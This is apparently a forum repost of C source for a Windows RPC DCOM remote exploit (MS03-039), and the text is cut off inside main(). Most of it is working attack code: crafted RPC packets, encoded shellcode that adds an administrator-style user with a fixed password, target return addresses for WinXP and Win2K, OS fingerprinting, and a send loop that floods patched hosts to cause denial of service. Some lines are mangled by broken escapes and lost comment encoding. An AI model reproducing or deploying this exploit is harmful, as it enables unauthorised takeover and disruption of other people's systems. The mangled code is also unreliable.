ANTICHAT — форум по информационной безопасности, OSINT и технологиям

----------------------------------------------
/* Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3) */
/* Must be used with the associated shell */
/* */
/* This exploit works against unpatched systems (MS03-039) */
/* And cause a Denial of Service on patched systems (rpc3) */


#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

FILE *fp1;
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00, 0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00, 0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8, 0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00 ,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2 ,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00 ,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00 ,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4 ,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00 ,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00 ,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00 ,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00 ,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00 ,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00 ,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00 ,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00 ,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00 ,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00 ,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00 ,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00 ,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11 ,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00 ,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57 ,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00 ,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00 ,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00 ,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85 ,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00 ,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00 ,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00,
0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00 };


unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00 ,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00 ,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00
};
void XOR(unsigned char *buf,int offset,int lenght,unsigned char mask)
{
for(int i=offset;i<(offset+lenght);i++)
buf[i]=buf[i]^mask;
}
DWORD GETSTRCS(char *buf)
{
DWORD cs=0;
bool cld=false;
for(unsigned int i=0;i<strlen(buf);i++)
{
for(int z=0;z<13;z++)
{
if(cs&1) cld=true;
cs=cs>>1;
if(cld) cs=cs|0x80000000;
cld=false;
}
cs+=buf[i];
}
return cs;
}

struct {
DWORD seh;
DWORD jmp;
DWORD heap;
char target[200];
} target_os[]=
{
{
0x005Bfd2c,
0x00081eeb,
0x00180000,
"WinXP"
},
{
0x0095fd3c,
0x00081eeb,
0x00170000,
"Win2K"
}
},v;
unsigned char rawData1[]=
"\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\ x00"
"\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\ x5C\x00"

"\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\ x46\x00\x38\x6e"
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\ x1b\x8d\xa0\x01"
"\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\ x99\x01\x80\x30"
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\ xf2\xe1\xea\xd2"

//SHELLCODE From SAM ,THANKs !
//Add user SST,password is 557,
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\ x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\ x99\x99\x12\x6D"
"\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\ x13\x97\x71\x3C"
"\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\ xEA\x71\x0F\x99"
"\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\ xD9\xA9\x14\xD9"
"\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\ xFD\xF1\xB9\xB6"
"\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\ xF1\xF7\xFC\xED"
"\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\ xB9\xAC\xAC\xAE"
"\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\ xFC\xED\xB9\x12"
"\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\ x99\x99\xF1\xED"
"\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\ xEB\xF1\xF0\xEA"
"\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\ xF1\xF5\xFE\xEB"
"\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\ x55\xC9\xC8\x66"
"\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\ x12\xF5\xBD\x81"
"\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\ x12\xC3\xB9\x9A"
"\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\ xAA\x59\x35\xA3"
"\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\ xBD\x8D\xEC\x78"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\ x9A\x44\x12\x9D"
"\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\ xC2\x5B\x9D\x99"
"\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\ x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\ x31\x21\x99\x99"
"\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\ x66"

"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\ xce\xaf\x1a\xce"
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\ xd6\xd7\xc3\xc6"
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\ x77\x6c\xe6\xd7"
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\ x6b\xc3\x6c\xc4"
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a"
"\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\ x90" //
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x77\xe0\x43\x00\x00\x10\x5c\x00"
"\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26
"\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os


//FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic
//"Utilization of released heap structure and exploit of universal Heap overflow in windows ".
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\ x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\ xBD\x9D\xC9\x14"
"\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\ x99\x99\xC9\xAA"
"\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\ x99\xC9\x66\xCF"
"\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\ xAC\x99\xAE\x99"
"\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\ x99\xEA\x99\xF1"
"\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\ xB9\x99\xF1\xF7"
"\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\ x29\x99\x99\x99"
"\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\ xC9\xC9\xC9\xCA"
"\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\ xC0\xAA\x59\xC9"
"\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\ x99\xB9\x99\xF1"
"\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\ xEB\x99\xF1\xF8"
"\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\ x99\xF1\xF0\x99"
"\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\ xF1\xEC\x99\xE9"
"\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\ xFA\x99\xF8\x99"
"\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\ x99\xFC\x99\x12"
"\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\ x1D\xBD\x91\x98"
"\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\ xBD\xB1\x98\x99"
"\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\ xCC\xCF\xCE\x12"
"\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\ x12\xD3\x81\x12"
"\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\ xAA\x66\x65\xAA"
"\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\ x6B\xA2\xE5\xBD"
"\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\ x12\xC3\x85\x9A"
"\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\ xC6\xC7\xC4\xC2"
"\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\ x59\xE1\x95\x12"
"\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\ xD9\xAD\x12\x31"
"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\ xEC\x64\x66\x66"

"\x04\x04\x00\x70\x00\x04\x40"
"\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\ xa0\x04\x00"

"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71" ;


int version(char ip[16], int sock)
{
//un poco de ettercap...


unsigned char peer0_0[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11,
0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00,
0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97,
0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00 };


unsigned char peer0_1[] = {
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20,
0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00,
0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb,
0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00,
0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x07, 0x00 };

/*

unsigned char win2kvuln[] = {
0x04, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00};
*/
fd_set fds2;
unsigned char buf[1024];

int l;
struct timeval tv2;
FD_ZERO(&fds2);
FD_SET(sock, &fds2);
tv2.tv_sec = 6;
tv2.tv_usec = 0;

memset(buf,'\0',sizeof(buf));
send(sock,(char *)peer0_0,sizeof(peer0_0),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
l=recv (sock, (char *)buf, sizeof (buf),0);
// for(i=0;i<52;i++)
// {
// if (i==28) i=i+4;
// if (buf[i+32]!=win2kvuln)
// {
send(sock,(const char *)peer0_1,sizeof(peer0_1),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
memset(buf,'\0',sizeof(buf));
l=recv (sock, (char *)buf, sizeof (buf),0);
if (l==32)
{
closesocket(sock);
return(1);//winxp
}
else
{
#ifdef WIN32
closesocket(sock);
#else
close(sock);
#endif
return(0);//win2kby default. Nt4 not added..
}
}
else return(-1);
// }


//}
// closesocket(sock);
// return(0);//win2k
}
closesocket(sock);
return(-1); //Unknown
}
/************************************************** ******************************/
int attack(char *ip1,bool atack)
{
unsigned char rawData[1036];
memcpy(rawData,rawData1,1036);
unsigned char shellcode[50000];
char ip[200];
strcpy(ip,ip1);
WSADATA WSAData;
SOCKET sock;
int len,len1;
SOCKADDR_IN addr_in;
short port=135;
unsigned char buf1[50000];
unsigned char buf2[50000];

printf("%s\n",ip);
//printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
//printf("Code by FlashSky,Flashsky xfocus org\n");
//printf("Welcome to our Site: http://www.xfocus.org\n");
//printf("Welcome to our Site: http://www.venustech.com.cn\n");
/* if(argc!=3)
{
printf("%s targetIP targetOS\ntargets:\n",argv[0]);
for(int i=0;i<sizeof(target_os)/sizeof(v);i++)
printf("%d - %s\n",i,target_os.target);
printf("\n%x\n",GETSTRCS(argv[1]));
return;
}
*/
/* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}
*/
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(ip);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==I NVALID_SOCKET)
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return 0;
}
len1=sizeof(request1);

len=sizeof(rawData);

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==S OCKET_ERROR)
{
printf("%s - connect failed\n",ip);
return 0;
}

int vers=!version(ip,sock);

// printf("%d\n",vers);
// return;
// int vers=1;

FILE *fp;

//?? ?? ? ???
// fp=fopen("shellcode","rb");
// fread(rawData,1,1036,fp);
// fclose(fp);
//???? ??? ???? ?? ??????????? ?????? ?????!

fp=fopen("bshell2","rb");
int sz=fread(shellcode,1,1024,fp);
fclose(fp);
// printf("%d\n",sz);
for(int i=0;i<sz;i++)
rawData[i+0x71]=shellcode[i];
// fp=fopen("badfile.exe","rb");
// unsigned int sz1=fread(shellcode,1,50000,fp);
// fclose(fp);
// for(i=0;i<sz1;i++)
// rawData[i+0x240]=shellcode;

// fp=fopen("pac","wb");
// fwrite(rawData,1,1036,fp);
// fclose(fp);

// return;


//??? ? ? ? ????? ? ??? ??? ???????? HEAP'a
// DWORD heap=0x00180000;
// int k=vers;
// vers=1;
// *(DWORD *)(rawData+0xae)=target_os[vers].heap;
*(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap;
//?????? ??? ?????? ? ? ???, ??? ?? ??? ??????? ??? ?
XOR(rawData,0x71,sz,0x99);
// XOR(rawData,0x240,sz1,0x99);
//? ? ?? ? ? ??? ? ??? ?? ??? ? ? SEH ? JMP
DWORD seh=target_os[vers].seh;
DWORD jmp=target_os[vers].jmp;
*(DWORD *)(rawData+0x22a)=jmp;
*(DWORD *)(rawData+0x22e)=seh;
// *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz));
*(WORD *)(rawData+0x62)=sz;


memcpy(buf2,request1,sizeof(request1));
*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2;
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);

memcpy(buf2+len1,rawData,sizeof(rawData));
len1=len1+sizeof(rawData);

memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;

*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;

closesocket(sock);
if(atack)
{
sock=socket(2,1,0);
WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL);

if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
{
printf("%s - send failed %d\n",ip,WSAGetLastError());
return 0;
}
else {printf("%s - send exploit to %s\n",ip,target_os[vers].target);}

len=recv(sock,(char *)buf1,1000,NULL);
bool ft=1;
if(ft)
{
int i=0;
while(1)
{
if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR)
{
printf("\nSend failed.Error:%d\n",WSAGetLastError());
return 0;
}
else
{
printf("\r%d",++i);
}
//Sleep(1000);
}
}
send(sock,(const char *)buf2,len1,0);
closesocket(sock);
}
else fprintf(fp1,"%s %s\n",target_os[vers].target,ip);
// fp=fopen("pac","wb");
// fwrite(rawData,1,1036,fp);
// fclose(fp);
}
unsigned long thread_count=0;
char adr[200];

DWORD WINAPI ThreadProc(
LPVOID lpParameter // thread data
)
{
thread_count++;
attack(adr,0);

thread_count--;
return 0;
}

int main(int argc,char ** argv)
{
//printf("%x %x",OF_READWRITE,GETSTRCS(argv[1]));
//return;
//HFILE hf=_lopen("asd123",0x1001);
//printf("%x",hf);
//_lclose(hf);
//return;

if(argc!=2){
fprintf(stderr, "RPC universal exploit. Exploit MS09-039 vulnerability\n"
"unpatched host - to codee xecution\n"
"patched host - to DoS\n"
"based on original XFocus RPCDCOM2 exploit\n"
